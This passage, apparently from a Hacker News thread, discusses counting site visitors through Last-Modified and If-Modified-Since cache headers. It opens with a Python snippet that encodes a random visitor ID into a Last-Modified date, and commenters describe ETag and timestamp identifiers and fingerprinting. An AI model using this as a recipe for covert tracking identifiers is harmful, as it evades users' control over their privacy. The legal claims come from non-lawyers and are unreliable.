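    """No If-Modified-Since sent: assign a random ID, return its Last-Modified."""
    visitor_id = rng.randrange(MAX_VISITORS)
    return visitor_id, _encode(visitor_id, 1)


def repeat_visit(if_modified_since: str) -> tuple[int, int, str]:
    """Decode the echoed date, bump the count, return the new Last-Modified."""
    offset = int((parsedate_to_datetime(if_modified_since) - BASE).total_seconds())
    visitor_id, visits = divmod(offset, SLOT_SECONDS)
    visits = min(visits + 1, SLOT_SECONDS - 1)  # stay inside this visitor's slot
    return visitor_id, visits, _encode(visitor_id, visits)
```

With these made-up parameters there are about 10^9 distinct dates, roughly the ~30 bits michaelt estimates further down; kapep's idea of several assets with different timestamps would multiply that space further.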
| lolinder wrote: | This kind of attack isn't new, though; trackers have been | using side channel tracking forever now. A quick search | shows that this _exact_ side channel tracking | vulnerability was discussed in the year 2000 [0]. | | I'm not saying the technique isn't similar: I just object | to people dogpiling on OP because _other_ people can and | do abuse the same header in nefarious ways. It's not | constructive, just a pointless attack on someone who's | actually trying to improve privacy. | | [0] http://www.sourcefrog.net/projects/meantime | ilyt wrote: | Kinda need one for the other if you want to distinguish | different users vs just one user clicking a lot. | | You need some kind of identifier to differentiate between | different sessions, and the moment you generate that ID, | using whatever way, you are tracking the user. | bawolff wrote: | Why would it be useless? Just pick a random date for each | user. | lolinder wrote: | I'm not talking about what you could theoretically do | with cache headers, I'm talking about what the author of | the article is actually doing. | bawolff wrote: | It's not like that is a far walk though. It's the exact | same technique, just storing different data. | | Respectfully I feel like this would be like seeing an | example of css turning a page blue and claiming the | technique is useless for turning the page red because | that is not the specific example used. | lolinder wrote: | If a bunch of people got up in arms and started | complaining because the author of said CSS example hadn't | considered that their code could be changed slightly to | produce a hate symbol, I'd definitely still jump in and | say "but that's not what they were doing!" | SkyBelow wrote: | Counting is not tracking, but counting unique visitors | requires tracking to know they are unique. If the person | outside of Costco is counting unique visitors, they must be | tracking who has already visited and who has not.
Even if | they aren't doing anything else with that information and | forgetting it each night, it is tracking. The existing | abuse of tracking has led to a level of backlash where any | tracking is seen through the worst possible lens. | jcuenod wrote: | It doesn't require tracking. Tracking would mean I could | tell that user x has returned n times. But I have no idea | who has returned, only that someone has returned n times. | | The person standing outside Costco is counting people by | giving them a colored sticker when they walk through the | door. If they show up already having one, the counter | issues a different color. Who has the stickers is | unknown; only the number of stickers distributed in each | color is known. | | As has been said, this is not to say the technique | couldn't be used for nefarious purposes. In this case, | it's not, though. | SkyBelow wrote: | That's still a form of tracking. Maybe not enough to | identify unique users in some use cases, but even just | knowing someone has been here n times is enough if the | user numbers are low enough that you can identify users | by unique n counts and patterns of n (such as if one user | is at 500 and another is at 490, if the second one is | logging in daily while the first one hasn't logged in for | a few months, and you see the 490 go 491, 492... when | they go from 499 to 500, there's a good chance that when a 500 logs on | tomorrow and becomes 501, it was the 490 account that has | been logging in daily). | jcuenod wrote: | Must admit, I've never thought of "number of times I've | visited your site" as PII. Number of times I've visited | every site in my browser history, maybe, but not "number | of times I've visited this specific site". I'm thinking | about it, but I'm not immediately convinced. | [deleted] | layer8 wrote: | If this becomes widespread, browsers will probably start fudging | the timestamps.
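jcuenod's sticker analogy maps fairly directly onto the counting side of the technique. Below is a minimal sketch, assuming the behaviour mulhoon describes further down: one tally per day, a Last-Modified set to the start of the day, plus one second to tell hits 1, 2 and 3 apart. The UTC day boundary, the `handle_ping`/`summary` names, and deriving bounces as first views minus second views are illustrative assumptions, not Cabin's actual code. Only per-day totals are kept, never a per-visitor row.

```python
from collections import Counter, defaultdict
from datetime import date, datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Optional

MAX_HIT = 3  # assumption: 3 means "third or later view today"

# Per-day aggregate tallies only; no identifiers are stored.
daily = defaultdict(Counter)


def handle_ping(if_modified_since: Optional[str], now: datetime) -> str:
    """Tally one page view and return the Last-Modified value to send back.

    Assumes the resource is revalidated on every view (e.g. served with
    Cache-Control: no-cache), so the browser echoes its stored date.
    """
    day_start = now.astimezone(timezone.utc).replace(
        hour=0, minute=0, second=0, microsecond=0)
    hit = 1  # no usable date from today: treat as a first view
    if if_modified_since:
        try:
            previous = parsedate_to_datetime(if_modified_since)
        except (TypeError, ValueError):  # unparsable header
            previous = None
        if previous is not None and previous.tzinfo is not None:
            offset = (previous - day_start).total_seconds()
            if 0 <= offset < MAX_HIT:  # one of today's "sticker colours"
                hit = min(int(offset) + 2, MAX_HIT)
    tally = daily[day_start.date()]
    tally["views"] += 1
    tally[f"hit{hit}"] += 1
    # Hit n is stored in the browser as day_start + (n - 1) seconds.
    return format_datetime(day_start + timedelta(seconds=hit - 1), usegmt=True)


def summary(day: date) -> dict:
    t = daily[day]
    # Each visitor adds one hit1; those who come back also add exactly one hit2.
    return {"views": t["views"], "uniques": t["hit1"],
            "bounces": t["hit1"] - t["hit2"]}
```

In this sketch a timestamp from yesterday falls outside today's window and simply counts as a new first view, which matches the "all knowledge is lost after one day" behaviour described in the thread. Capping at 3 also keeps the count from ever walking through the day's 86,400 seconds.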
| glenjamin wrote: | I think the comments on this post would probably be less hostile if | the title said something like "detect the number of unique | visitors", which is what I believe it's doing, rather than | detecting unique visitors using unique timestamps, which is what | many seem to be guessing based on the headline alone. | andix wrote: | It would be interesting to know whether it is also possible to abuse it: is | it possible to create enough unique timestamps that | browsers still accept? Can you add milliseconds to the TS, | and do browsers store them too? Or do browsers also accept | timestamps from months or years back and re-send them? If you | can use the whole scale of Unix time (int32), there is a huge | pool of entropy available. | | In this case they don't do this evil thing, and it probably | would still violate the European GDPR, even if it's not an | actual cookie, but somebody has to find it first. | kapep wrote: | Even without millisecond precision, you could embed multiple | assets that are served with slightly different timestamps to | encode a unique identifier. | tedunangst wrote: | Your personal visit count is embedded in the seconds. | lisper wrote: | Yes, but not your identity. | michaelbuckbee wrote: | They're using this to track number of unique visits from a | single user to a site. | Thorrez wrote: | Yes, but I think they're not tracking anything else about the | user besides number of visits. E.g. they're not tracking IP, I | don't think. | | And I think they are only doing it within a single day, not | across days. | | If you know that someone exists who visited your site 500 | times today, but know nothing else about the person, is that | a privacy problem? | rkagerer wrote: | ...at the cost of caching (or at least a round trip). | | Is it necessary to know how many visits per day a particular user | made? If # of unique visitors per day/week/whatever is | sufficiently granular you could retain a corresponding cache | window.
| | Also if this is to avoid those cookie warnings that got popular | after GDPR, it should be noted you're still storing information | on users' computers. That is, the stuffed metadata is not so | different in principle from a cookie. In this case it seems | innocuous, but I wouldn't be surprised to see sites exploit your | trick to store a unique last-modified date for each user as a | method of tracking (if that's not already commonplace). | not2b wrote: | The number of unique visits in a day is the number of total | visits minus the number of repeat visits from the same users, | so they need something like this to get an accurate count. You | can't produce the number without information on repeat | visitors. | | I think you are right that this technique could be changed and | turned into a way to track individual users. But as | implemented, it doesn't do that, and all knowledge is lost | after one day. We shouldn't criticize people who are trying to | limit the information they collect to the bare minimum by | pointing out an altered version of their system might have | undesirable properties. | rkagerer wrote: | Then the server doesn't need to know about repeat visits that | don't hit it, and it would be nice to maintain caching | support if the page content is static. | irq-1 wrote: | Change 'last-modified' to use a secure hash of the contents, like | sha256. Then the browser can detect if a website is giving bad | hashes, potentially using them for tracking. | sdfhbdf wrote: | That's what ETag is for. | | https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET... | irq-1 wrote: | ETags can be anything -- they aren't required to be a hash of | the content. | | Thinking about this problem, why does the browser expose any | information about what's in the cache? Client-side JavaScript | can't tell what's in the cache because it's an obvious | security issue. Why let the server know?
| | Browsers should ask for the hashes on a list of content | without exposing their cache contents. Then the browser can | request anything that's changed. | jefftk wrote: | The way If-None-Match works is that the browser says "give me the | latest if this ETag represents an out-of-date resource, | otherwise I'll keep using my copy." It's not clear to me | how you're proposing this would work instead? | | (Also, in many cases the server uses a hash of the inputs | used to generate the resource, which isn't something | externally verifiable) | jefftk wrote: | ETag doesn't have any assurance that it's a hash of the page | contents: the current protocol doesn't stop the server from | embedding arbitrary information in the ETag, and there's no | way for the client to tell. | debugnik wrote: | Neither does Last-Modified, as we just saw. If we were | going to alter the meaning of a header for this, it should | be ETag. Just agree on ETag formats that browsers can | verify are just hashes, and have them throw away any opaque | ETags or dates. | jefftk wrote: | You'd need to introduce something new for that. Many | servers compute ETags today as hashes of _inputs_ to a | process. | | (Which is nice computationally, since you can immediately | say "not modified" instead of building the response, | hashing it, and throwing it away if the hash matches) | debugnik wrote: | Well, I said "just hashes" for short, but such ETag | formats could agree on other algorithms as well, as long | as the browser can verify them. | | And introducing a new method doesn't solve the issue of | deprecating the existing abusable methods, which is why I | suggested one that can already be implemented by privacy- | first browsers one-sidedly. Servers would then be | pressured to migrate to some friendly ETag format if they | don't want to completely lose client-side caching for a | (hopefully growing) share of their userbase.
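debugnik's proposal can be sketched from the client side. The `"sha256-<hex>"` ETag format below is a made-up convention for illustration; no such format is standardized. Under it, a privacy-first browser would keep an ETag for later If-None-Match revalidation only if the ETag provably equals the SHA-256 of the body it actually received, and would drop anything opaque.

```python
import hashlib
import re
from typing import Optional

# Hypothetical convention: a strong ETag of the form "sha256-<64 lowercase hex digits>".
_HASH_ETAG = re.compile(r'"sha256-([0-9a-f]{64})"')


def verifiable_etag(etag: Optional[str], body: bytes) -> Optional[str]:
    """Return the ETag only if it is exactly the SHA-256 of body, else None.

    A None result means the client stores no validator, so the value is
    never echoed back in If-None-Match and cannot carry an identifier.
    """
    if etag is None:
        return None
    match = _HASH_ETAG.fullmatch(etag)
    if match is None:
        return None  # opaque or weak ETag: discard it
    if hashlib.sha256(body).hexdigest() != match.group(1):
        return None  # claims to be a hash but does not match the content
    return etag
```

The cost is the one jefftk raises: a server that today derives ETags from a hash of its inputs would have to switch to hashing (or caching a hash of) the final response body to keep client-side revalidation with such a browser.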
| Isinlor wrote: | This is really no different than a cookie - basically the same | mechanism from the view of the server just different semantics. | geocar wrote: | Well, yes you could have a cookie with C=C+1 and carefully set | the expiration to the end of the day (like the article), or you | could use randomly generated last-modified times and | deduplicate server-side (similar to how cookies are usually | used), but I can think of a few reasons the cache would give | greater precision, so even if a lot of the same things are the | same, I'm not so sure it's really "no different"; these things | are pretty important to (some) publishers: | | - third-party cookie blocking/notification features in browsers | | - review processes on ad networks checking for actual cookies | rather than suspicious last-modified times | legitster wrote: | If anything, this is worse. | | Cookies have built in browser behavior - they have limited | scope, the browser lets you see them, they get cleared out | regularly. | | Abusing metadata is way sketchier. | eurasiantiger wrote: | Chances are they aren't the first to come up with something | like this. How can we detect this kind of metadata abuse? | fanso99 wrote: | perhaps randomize minutes/seconds of the "last-modified" | header. | notpushkin wrote: | Or perhaps just drop minutes/seconds. And maybe don't | store the date altogether for files that are small | enough? | pornel wrote: | Important to note that privacy laws that regulate tracking are | not limited to the Cookie header. They apply to tracking and | data collection in general, regardless of how technically | clever you make it. | ape4 wrote: | Yes, cookies are a header field sent back by the browser and so | is this. | pavon wrote: | Exactly. They could have the same functionality and privacy | characteristics if they simply kept a cookie that incremented | each time the site was visited. 
The fact that they didn't go | this route suggests this is more about finding a way to track | unique visitors when cookies are disabled. They are | deliberately subverting the user's desire to not be tracked and | spinning it as a privacy win. | dahfizz wrote: | If it was about tracking users, wouldn't they generate a | unique timestamp per visitor on the first visit? Giving | everyone the same timestamp is a terrible way to try and | track individuals. | dvko wrote: | This is part of why I quit my privacy focused analytics start- | up years ago. I won't name it directly, but it was one of the | first and is still going strong (although not really open- | source anymore). | | People kept asking for cookieless tracking but with another way | of identifying returning visitors that was always worse from a | privacy standpoint. Cookies can be controlled by the client; | anything stored on the server cannot. | | Honestly, cookies are pretty nice, it's the law around this | that sucks. Tricks that attempt to bypass the laws will surely | only work for a limited time, at least I hope they will... | yunruse wrote: | Hm, on Safari 16.1 it seems reloading twice clears the cache and | therefore the counter (but e.g. cmd-W cmd-Z cmd-R will safely | increase it). Either way, I think I would prefer this behaviour | to be some sort of cookie that the law okays, because as everyone | else has said, I'm quite sure browsers will fuzz these data. | | (I would probably go for a Gaussian fuzzer each visit, just | because it adds the off chance that it's quite a way away from | any attempted ID, making it a little bit more difficult to cast a | wider net and get a few bits of entropy) | mikem170 wrote: | Their demo counter [0] didn't work in my browser, maybe because I | normally have javascript disabled. | | In the demo it seems they have XMLHttpRequest code calling | ping.withcabin.com/cache for this trick of theirs. | | Can this method of counting be made to work without javascript?
| | [0] https://lastmodified.normally.com/ | zagrebian wrote: | > Many privacy-focused analytics services will generate and store | a UID on the server instead of saving it in a cookie - based on a | hash of your User Agent, IP, Location, Date etc. | | What location? The Geolocation API? | | What date? How can a date contribute to a UID? Each visitor sends | multiple HTTP requests at different dates. | notpushkin wrote: | If it's anonymous and doesn't collect any user data, why do we | need it at all? Would using a cookie for the same purpose (just a | counter of visits, resetting every day) trigger the GDPR laws | somehow? It would work in literally the same way except being | transparent to the user instead of utilizing some shady | technique. | zzo38computer wrote: | The browser should be able to detect that the date is not valid (and that | its precision is wrong), and avoid sending an "If-Modified- | Since" header. (The same would be true if they were assigned at | random rather than sequentially like this; it still should be able | to detect that they are not valid and have wrong precision.) | [deleted] | birdmanjeremy wrote: | The demo doesn't work in Safari on my Mac. It sometimes gets to | 2, but on refresh goes back to 1. Actually, got it up to 4 one | time. Seems like the claims of "Works in any browser and any | server" are overstated. | devmunchies wrote: | same. I got it up to 8 by clicking into the address bar and | hitting enter. However, doing a refresh instead caused it to | reset (the browser didn't send the if-modified-since header so | the server didn't do its little trick and instead started | over) | alexmolas wrote: | What if during a day I visit the website more than 86400 times? | ;) | speedgoose wrote: | > This is great for privacy as we don't need to use cookies, IP | addresses, fingerprinting or unique identifiers. In our tests, | this method proved durable enough to be the most reliable method | of counting unique visitors without using cookies.
| | The differences with a cookie are that the headers are named Last- | Modified and If-Modified-Since instead of Set-Cookie and Cookie, and the value must be | a datetime in the RFC2616 format. | | How is it good for privacy? I think it's worse because it's | invisible to the user. I would bet tracking visitors using such | a hack isn't compatible with GDPR, which requires informed | consent for tracking. And good luck explaining your hack to the | average visitor. | Etheryte wrote: | You seem to slightly misunderstand how GDPR works. Tracking in | and of itself is not the problem, it's personal data and | personally identifying data that is. You can count how many | hits your server receives no problem, this is roughly the same | idea. | havkom wrote: | Basically the "cookie consent" part in the EU stems from the | e-privacy directive. Article 5.3 refers to GDPR (through the | directive that is replaced by GDPR) and reads: | | Member States shall ensure that the storing of information, | or the gaining of access to information already stored, in | the terminal equipment of a subscriber or user is only | allowed on condition that the subscriber or user concerned | has given his or her consent, having been provided with clear | and comprehensive information, in accordance with Directive | 95/46/EC, inter alia, about the purposes of the processing. | This shall not prevent any technical storage or access for | the sole purpose of carrying out the transmission of a | communication over an electronic communications network, or | as strictly necessary in order for the provider of an | information society service explicitly requested by the | subscriber or user to provide the service. | | In short, this method may fall under the EU "cookie law" | above. The use of timestamps may require consent if they are | used to distinguish users (even if only for counting | purposes). The timestamps may then also be personal data | under the GDPR.
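For comparison, the cookie-based equivalent raised by pavon, geocar and notpushkin (a visit counter that simply expires at the end of the day) takes only a few lines with Python's standard library. The cookie name `hits`, the cap of 3 and the UTC midnight expiry are hypothetical choices for this sketch. It stores the same information as the Last-Modified trick, but in a place browsers expose to the user and let them clear.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime
from http.cookies import CookieError, SimpleCookie
from typing import Optional, Tuple

COOKIE_NAME = "hits"  # hypothetical cookie name
MAX_HITS = 3          # hypothetical cap, mirroring "hits 1, 2 and 3"


def count_visit(cookie_header: Optional[str], now: datetime) -> Tuple[int, str]:
    """Return (hit number, Set-Cookie value) for a per-day visit counter."""
    jar = SimpleCookie()
    try:
        jar.load(cookie_header or "")
    except CookieError:
        jar = SimpleCookie()  # malformed Cookie header: start from scratch
    try:
        previous = int(jar[COOKIE_NAME].value) if COOKIE_NAME in jar else 0
    except ValueError:
        previous = 0  # non-numeric value: treat as a first visit
    hit = min(previous + 1, MAX_HITS)
    # Expire at the next UTC midnight, so the count resets every day.
    midnight = (now.astimezone(timezone.utc) + timedelta(days=1)).replace(
        hour=0, minute=0, second=0, microsecond=0)
    out = SimpleCookie()
    out[COOKIE_NAME] = str(hit)
    out[COOKIE_NAME]["expires"] = format_datetime(midnight, usegmt=True)
    out[COOKIE_NAME]["path"] = "/"
    return hit, out[COOKIE_NAME].OutputString()
```

Whether this needs consent is exactly the ePrivacy question quoted above; the sketch only shows that, mechanically, the two approaches carry the same data.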
| luckylion wrote: | This is equivalent to setting a cookie with a hit count. It's | still storing & submitting information, it's just not using a | unique identifier (which is pretty privacy-respecting, I'm | not saying it's a terrible thing or something). | | I assume it will be treated as such, too. If you can use a | cookie to do this without consent, this is fine too. If you | can't then it's not. The same happens for local/session | storage: it's cookie-equivalent. | xyproto wrote: | The user with the highest visit count will always be | uniquely identifiable, though. | not2b wrote: | Only on the same day. Everything is reset the next day. | jiveturkey wrote: | I don't follow how this is a problem. | | By that measure, any users behind a unique single IP (no | IP pooling, no CGNAT, etc) will always be uniquely | identifiable. And for IP there are far fewer steps to | personally identify the user. The server necessarily sees | the user IP. | speedgoose wrote: | Yes, the IP can be used to identify people. If you want | to track users using their IP and respect GDPR, you need | to get their consent first. | | It's best not to store them before you get consent. | Having a temporary access log with a few IPs is probably | fine. But keeping all your access logs forever for | analytics purposes is not fine anymore. | speedgoose wrote: | I will quote the law: | | > Natural persons may be associated with online identifiers | provided by their devices, applications, tools and protocols, | such as internet protocol addresses, cookie identifiers or | other identifiers such as radio frequency identification | tags. This may leave traces which, in particular when | combined with unique identifiers and other information | received by the servers, may be used to create profiles of | the natural persons and identify them. | jakobdabo wrote: | ETag (paired with If-None-Match header sent by the browsers) is | another caching header to be aware of.
| | https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET... | doomrobo wrote: | Ooh that's kinda evil. A server could give a client a uniquely | identifying ETag for a given URL. So whenever the client comes | back on the same browser, they're identified. | | Fortunately this is probably just as detectable as the Last- | Modified abuse in the post. | bawolff wrote: | There are a lot of things like that. Although browsers | changed it recently, you also used to be able to use TLS | session tickets. | | Another one was the favicon cache. | | Pretty much any state on the browser can be used to track | people. | mulhoon wrote: | Hi, author of the article here. | | Just to give a little more background here. | | Cabin doesn't store a row in a database for each visit. It only | stores one row, per day per domain. The attributes for that row | are simple tally counts - visits, uniques, bounces etc. So no | identifier is stored, and the hits go into the tally. We do not | store the fact that a user has visited x amount of times. The | demo here is to show how the technique works. | | Cabin used to detect only the presence of _any_ last-modified | date to determine if the visit is unique or not. But extending it | to distinguish hits 1,2 and 3 (by adding 1 second to the start of | the day) now allows us to count the bounce rates too. | ohbtvz wrote: | Have lawyers familiar with EU law vetted your technique? Could | you share their legal reasoning? If not, why would anyone ever | take the risk to use your product and face huge fines? | senko wrote: | (Not OP) | | I am all for privacy, use uBO, Firefox Focus / Incognito and | Google alternatives. But if I have to consult a lawyer each | time I write some code or write up a blog post, I'll take up | gardening instead. | jefftk wrote: | The OP is a "privacy-first web analytics" company; this is | totally something they should be asking their lawyers. 
| | Note that they list the GDPR on their "Privacy law | compliance" page (https://docs.withcabin.com/privacy.html) | but not ePrivacy... | ohbtvz wrote: | No need for this kind of hyperbole. I wouldn't ask this | question if the OP's post didn't contain grandiose claims | such as "No cookies, no consent banners, no ad networks, | 100% GDPR & CCPA compliant, low footprint web analytics." | OP made a claim about their compliance with EU law. I'm | asking for proof or at least an explanation. | rcoveson wrote: | How about just consulting a lawyer each time you abuse a | protocol to get users' software to behave in a way that is | invisible to them and benefits you? | | There is already a correct way to tell a browser to tell | the server something with each subsequent request: Cookies. | Nobody needs to "write some code" here; it's already | written. Working around the protocol isn't engineering, | it's just lying. | | This blog post is just another cynical degradation of trust | between users and their browsers, and browsers and the | servers they talk to. Just another part of HTTP that we | can't use for what it was designed for anymore because | servers want so desperately to track visitors uniquely and | a significant subset of visitors would prefer not to be | remembered uniquely. | jefftk wrote: | Your landing page says "no cookies or consent banners" and | "compliant with all privacy laws", but the timestamp approach | stores data on a user's computer in a way that is not "strictly | necessary in order to provide an information society service | explicitly requested by the subscriber or user". Could you | explain how you see your approach as compliant with the | ePrivacy directive? | | Full text: https://eur-lex.europa.eu/legal- | content/EN/TXT/HTML/?uri=CEL... | | Guidance: | https://ec.europa.eu/justice/article-29/documentation/opinio... | IshKebab wrote: | Yeah this is just a cookie by another name. Probably already | used by supercookies.
| | The GDPR doesn't single out cookies so you can't get around | it by using a different storage device. | jefftk wrote: | _> The GDPR doesn 't single out cookies so you can't get | around it by using a different storage device._ | | Quibble: this isn't a GDPR issue, it's an ePrivacy issue. | Two different regulations. | lolinder wrote: | Thanks for sharing! | | I personally don't have an issue with it, but one thing that | might set some of the people here at ease is if you stopped | incrementing the timestamp after the second visit. | | This would give you three possible states anyone could be in: | never visited, visited once, and visited more than once. It's | less data, but still enough to give you your bounce rate _and_ | your total visits while minimizing the number of boxes you 're | sorting individual visitors into. | josephscott wrote: | This reminded me of something I haven't thought about in awhile: | evercookie - https://github.com/samyk/evercookie | [deleted] | tobr wrote: | That's pretty clever. I think if you really want to keep it | privacy respecting, you should stop counting at 1 - so you can | distinguish the first vs subsequent visits, but you can't tell if | someone has visited 2 or 200 times. | AkshatJ27 wrote: | what is the problem with letting a website know how many times | I have visited the page? How is it better for a website to only | know if I have visited earlier or not? | xyproto wrote: | Many clients may have visited only one time, but when you | reach higher numbers they may be used together with other | data to help identify users. | | Maybe only one user will have over 100 visits, and then you | can uniquely identify them. | barefeg wrote: | Makes sense. I'm not very experienced in privacy but could | you explain why uniquely identifying the user is a problem? | As in you can tell that there's one user who visited 100 | times but how can you use that information to correlate | with an identity? 
| _justinfunk wrote: | This is also my question that all the people wearing | their smart lawyer hats seem to be claiming but not | explaining. | WirelessGigabit wrote: | Every subsequent visit they bump up the number. | cortesoft wrote: | I am having trouble understanding how knowing someone has | visited three times is more privacy invasive than knowing they | visited twice. What is so magical about 3? | tobr wrote: | Consider that there's some long tail of visitors who visit | many times in one day. Someone is going to be visiting more | times than anyone else, whether that's 10 or 100 or 1000 page | views. That person is now uniquely trackable. To avoid that | situation you need to stop counting somewhere, and you're not | really getting any new info after 1 (well, 2 I suppose, if | you want to track bounces), so you might as well stop there. | dahfizz wrote: | I don't agree that the existence of this header makes a | user more trackable. You can already uniquely identify | visitors with their IP & source port, which is included in | every single packet and is way more specific than some | timestamp. | | Your argument seems to be that this timestamp in the header | could possibly be used as a lookup key in a database of | visitors. I think that's a stretch, but in any case that | database would be the privacy violating thing. This header | is completely anonymous. | tobr wrote: | You're probably right! But since they aren't getting any | more info by continuing to count after 2, it's just a | liability to do it. After all, the whole point of the | setup seems to be to minimize the amount of unique | information the system has to process. | o_m wrote: | Counting to two is needed to handle the bounce rate. | kube-system wrote: | 3 is magical in that it comes after 2. | | If 100 people visited once, and one person visited twice... | then a new request with visitCount=3 is that second person. 
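tobr's and kube-system's argument is essentially about anonymity-set size: how many visitors share each value the server can see. A toy Python sketch makes it concrete; the visit distribution and helper names are invented for illustration.

```python
from collections import Counter
from typing import Iterable, Optional


def crowd_sizes(views_per_visitor: Iterable[int], cap: Optional[int] = None) -> Counter:
    """Map each stored counter value to how many visitors share it."""
    return Counter(v if cap is None else min(v, cap) for v in views_per_visitor)


def smallest_crowd(views_per_visitor: Iterable[int], cap: Optional[int] = None) -> int:
    """Size of the smallest group; 1 means someone is singled out."""
    return min(crowd_sizes(views_per_visitor, cap).values())


# Example: 100 one-time visitors, one who came twice, one heavy user.
views = [1] * 100 + [2] + [40]
print(smallest_crowd(views))         # uncapped: the 40-view visitor stands alone
print(smallest_crowd(views, cap=2))  # capped at "more than once"
```

Uncapped, the heaviest visitor sits in a crowd of one. Capping at 2, as lolinder suggests, keeps what a bounce rate needs while merging every repeat visitor into one group. On a low-traffic site that group can still be small, which is SkyBelow's point.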
| Jabdoa2 wrote: | I guess according to GDPR this counts as tracking nonetheless. | GDPR does not specifically mention cookies or anything technical. | An identifier is enough (it does not have to be a UUID). IP, | location, browser, etc. already count. This would probably count | as storing something like a cookie on the client. | WirelessGigabit wrote: | I wonder how this works with systems like Akamai, which by default | mess with those headers. | DueDilligence wrote: | ... and we're fast on our way to a WebKit extension to block this | BS. | cactacea wrote: | Why block it entirely when you can just feed them garbage data? | cpeterso wrote: | Sending a garbage Last-Modified time might confuse the server | and cause unpredictable problems for the user. Blocking it is | safe because the server will just assume this is the first | time the user has visited the website. | enkrs wrote: | What's the motivation to block/misinform? | | This allows site owners to get statistics on page | views/uniques/bounces without unique identifier cookies or | JavaScript injections. | | I'm all for blocking any abusive tracking methods, but this | looks to me like creative website statistics that work for a | single domain. What's the harm in measuring that? | michaelt wrote: | While this _particular_ implementation doesn't track | individuals, couldn't you trivially start tracking | individuals by sending them unique random times like | _last-modified: 12 Mar 1978 12:34:56 GMT_, thereby giving them a | ~30-bit unique identifier for as long as the file is | cached? | pwdisswordfish0 wrote: | Only if you disregard the amount of latitude that the | semantics of these headers give to UAs that would | effectively thwart this method of tracking. | | If I fetch your /foo.html today in November 2022, and you | send me a last-modified from 1978, that gives me and my | UA a huge range from which to select a different datetime | (anywhere between the 1978 value and now-ish) on my next | request.
How are you going to correlate my original and | subsequent requests if in the latter I ask if you've got | a copy that's been modified since 1999? | marshray wrote: | Sure, a UA _could_ do a whole lot of things to resist | fingerprinting. | | But users go to the web with the browser they've been | given. | | Apple, famously, forbids its users to speak HTTP with | anything else on iOS. | nkrisc wrote: | > What's the motivation to block/misinform? | | What's the motivation to submit to it? | yojo wrote: | Allowing websites to get a somewhat accurate count of | visitors plus bounce rate helps them to tell how they're | doing. Hopefully, they use that to guide developing a | better product/service. | | If you can allow them to do that without getting tracked, | it's a win-win. You get a better experience when they build | a better service. | yojo wrote: | To be clear, they're not generating _unique_ headers. They're | setting them to the start of the day, so they can tell if the | requester has already been to the site today or not. It | actually seems pretty reasonable. | pavon wrote: | The way they are using it provides less information than | a UID cookie would, but the same amount of information as a | boolean "previously visited" cookie. However, now that the | technique is known, there is nothing stopping people from | using the same method to store a UID date, and | privacy-protecting clients will have difficulty differentiating | between the two, so it's best to eliminate this as a | fingerprinting method altogether. | not2b wrote: | People keep saying in this thread "there is nothing | stopping people from using the same method" to do something | else! I think that this is an irrelevant criticism. This is | a valid attempt to minimize the amount of information | collected on visitors while still providing a count of unique | visitors per day, and the fact that someone could build a | similar but different system that looks like a cookie isn't | relevant.
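pwdisswordfish0's point, that a UA has latitude in what it sends back, can be sketched as a client- or proxy-side rewrite of If-Modified-Since. This is a hypothetical Python helper, not what any browser or Privoxy actually does: `fuzzed_if_modified_since` picks a random whole second between the cached Last-Modified and the current time, so a server-assigned date no longer round-trips unchanged.

```python
import random
from datetime import datetime, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Optional


def fuzzed_if_modified_since(cached_last_modified: str, now: datetime,
                             rng: Optional[random.Random] = None) -> str:
    """Hypothetical defence: send a random instant between the cached
    Last-Modified and `now` (timezone-aware) instead of echoing it verbatim.

    Caveat: a date later than the real Last-Modified can earn a 304 for
    content that changed in between, trading freshness for privacy.
    """
    rng = rng or random.Random()
    lm = parsedate_to_datetime(cached_last_modified)
    if lm.tzinfo is None:  # "-0000" parses as naive; treat it as UTC
        lm = lm.replace(tzinfo=timezone.utc)
    start = int(lm.timestamp())
    end = max(start, int(now.timestamp()))
    chosen = datetime.fromtimestamp(rng.randint(start, end), tz=timezone.utc)
    return format_datetime(chosen, usegmt=True)
```

Sending an earlier date than the real one is harmless (the server just returns the full resource), but a later one can produce a stale 304, which is one concrete form of the "unpredictable problems" cpeterso mentions.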
| pavon wrote: | They demonstrated a PoC that uses an HTTP feature in a | way it wasn't intended, to add entropy to fingerprinting | techniques. Discussing how this same exploit could be | used maliciously by others and how to prevent that isn't | criticism of the PoC; it is standard security practice. | chipsa wrote: | But you can't have as many bits in a UID date as in a | generic cookie, and a privacy-protecting client could just | ignore the ones that don't make sense. Does a 1978 date | make sense? Probably not. You could scale this up to the | millions, probably, but it won't scale infinitely. | genewitch wrote: | Roblox has ~50mm daily users (DAU), and if my math is | correct (it probably isn't) you could have hour | granularity (only 0-23) timestamps on 6 files, each day, | and track 191mm unique users. I used Roblox because I | knew their DAU off the cuff; because Roblox requires a | login, they know who you are anyhow. | | But if you do 1-second granularity, a mere 2 cache | timestamps are enough to fingerprint everyone on the | planet, each day. | | Is my math wrong here? | rnhmjoj wrote: | There probably is one already: this method is so old that the | documentation of Privoxy shows[1] how to defeat it. I can | confirm it works: their example[2] website says I've visited | 61996 times. | | [1]: https://www.privoxy.org/user-manual/actions-file.html#OVERWR... | | [2]: https://lastmodified.normally.com/ | jesprenj wrote: | What's the reason for not storing a cookie? It's not like | browsers that don't support cookies are targeted, right? Cookies | can also be "great for privacy", if their power is not abused | server-side ... | jefftk wrote: | I think this is probably illegal in EU countries. The ePrivacy | Directive requires consent before storing data on a user's | machine that isn't strictly necessary for providing the service | the user requested.
Analytics isn't "strictly necessary", and | ePrivacy doesn't care whether you use the Cookie header or some | other method of storage. | | I do think this is better for privacy than standard ID-based | approaches, but the law is very strict. More: | https://www.jefftk.com/p/why-so-many-cookie-banners | | (Not a lawyer) | yellow_lead wrote: | Assuming you're correct, can anyone think of a way to count | unique visitors without storing data on a user's machine _or_ | using identifiable user information? Identifiable user | information should include hashes that can be re-computed given | the original information. | | This isn't a criticism of the law; I'm just curious what | options there could be, because I can't think of any. | genewitch wrote: | Hi there, Marketing Company Intern! | | Tell them you'd rather make the coffee ;-) | 411111111111111 wrote: | Ha, that would explain that question. My first reaction was | mostly confusion, as there is so much prior art at this | point, e.g. fingerprinting through installed add-ons, | resolution/window size/system language, browser language, | IP locality, etc. There are even demo pages around which | show you just how unique your configuration is, even | without anything else. | | https://amiunique.org/fp | yellow_lead wrote: | Lol, I knew it would sound that way, but I don't work in | this domain; I'm just interested in privacy and this problem. | genewitch 